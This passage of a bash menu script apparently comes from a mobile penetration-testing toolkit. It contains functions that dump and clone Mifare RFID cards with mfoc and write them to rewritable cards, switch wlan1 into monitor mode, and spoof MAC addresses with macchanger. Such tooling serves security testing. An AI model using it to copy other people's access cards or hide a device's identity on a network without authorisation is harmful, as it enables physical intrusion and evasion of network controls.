			rm $LOG_PATH/$CTIME-$TEMP_CARD.mfd
			echo ""
			echo "[!] Something went wrong... [!]"
			echo ""
			echo "[*] Ready to clone... [*]"
			echo ""
		fi
	fi
else
:
fi
sleep 3
done
}

f_mifarewrite(){
# This script will write previously cloned Mifare cards to a blank/rewritable card.
# Options are provided for card type (non-UID/UID writeable) and key type (A/B).
# Tested using a SCL3711 usb dongle.

clear
# Ensure that we do in fact have cards ready to write
if [ ! -d "/root/cards/" ]; then
 	echo "[!] You don't have any cloned cards."
	exit 0
else
	cd ~/cards
fi

# We need to dump the contents of the blank card before moving forward.
echo "[*] We need to dump the contents of the blank/rewritable card."
echo ""
read -p "[*] Present the card to the reader and press [Enter] to continue." continue
echo ""

# Loop to make sure that we get a good dump.
rm /tmp/blank_card.mfd > /dev/null
while [ ! -f "/tmp/blank_card.mfd" ];
do
	mfoc -P 500 -O /tmp/blank_card.mfd
	echo ""

	# Check to see if the dump was successful. If not restart the loop.
	if [ -s "/tmp/blank_card.mfd" ]; then
		echo "[*] Got it! Moving on..."
		sleep 3
	else
		rm /tmp/blank_card.mfd
		echo "[!] Something went wrong, trying again..."
		sleep 3
		clear
	fi
done
}

######################## MONITOR MODE MENU #############################
f_mon(){
  clear
  echo "Enable or Disable Monitor Mode on wlan1"
  echo "[1] Enable monitor mode"
  echo "[2] Disable monitor mode"
  echo ""
  echo "[0] Main Menu"
  echo ""
  read -p "Choice: " monchoice

  case $monchoice in
    1) monmode=start;;
    2) monmode=stop;;
    0) clear; f_interface;;
  esac

  airmon-ng $monmode wlan1
  f_interface
}

######################### SAFELY EJECT WI-FI ############################
f_safeeject(){
  clear
  echo "Stopping Services. Please Wait."
  airmon-ng stop wlan1
  ifconfig wlan1 down
  sleep 8
  clear
  echo "You should now be able to safely remove your Wi-Fi card."
  echo ""
  read -p "Press [Enter] to return to the main menu" null
  f_interface
}

########################## SETTINGS MENU ###############################
f_settings(){
clear
echo "				SETTINGS"
echo ""
echo "[1] Configure Timezone"
echo "[2] Macchanger"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice:" settingschoice

case $settingschoice in
1) clear; dpkg-reconfigure tzdata ;;
2) clear; f_macchanger ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_macchanger(){
# make sure ifconfig wlan1 is up already
adaptor=`ip addr | grep wlan1`
if [ -z "$adaptor" ]; then
    ifconfig wlan1 up
fi
f_pick_interface
read -p "Use random MAC address on ${pickinterface}? (y/n)" randommac
if [ "$randommac" == "y" ]; then
	macchanger --random $pickinterface
	else
		read -p "Would you like to set a specific MAC address for ${pickinterface}?" specificmac
		if [ "$specificmac" == "y" ]; then
			read -p "Enter your specific MAC address: " spec_evil_mac
			macchanger --mac=$spec_evil_mac $pickinterface
		fi
fi
f_settings
}

##############################################
# PICK INTERFACE USED FOR MULTPILE FUNCTIONS
##############################################
f_pick_interface(){
echo ""
echo "Choose which interface to use"
echo ""
echo "[1]	wlan0"
echo "[2]	wlan1 (External wireless USB)"
echo "[3]	rmnet0 (3G)"
echo "[4]	eth0 (Ethernet)"
echo "[5]	rndis0 (USB > Ethernet)"
echo "[6]	usb0 (USB > Ethernet)" # N7 2013 creates usb0 when tethering/badusb
echo ""
read -p "Choice: " sniffinterface

case $sniffinterface in
1) clear; pickinterface=wlan0 ;;
2) clear; pickinterface=wlan1 ;;
3) clear; pickinterface=rmnet0 ;;
4) clear; pickinterface=eth0 ;;
5) clear; pickinterface=rndis0 ;;
6) clear; pickinterface=usb0 ;;
*) echo "Incorrect choice..." ;;
esac
}
# **** START **** #
f_interface
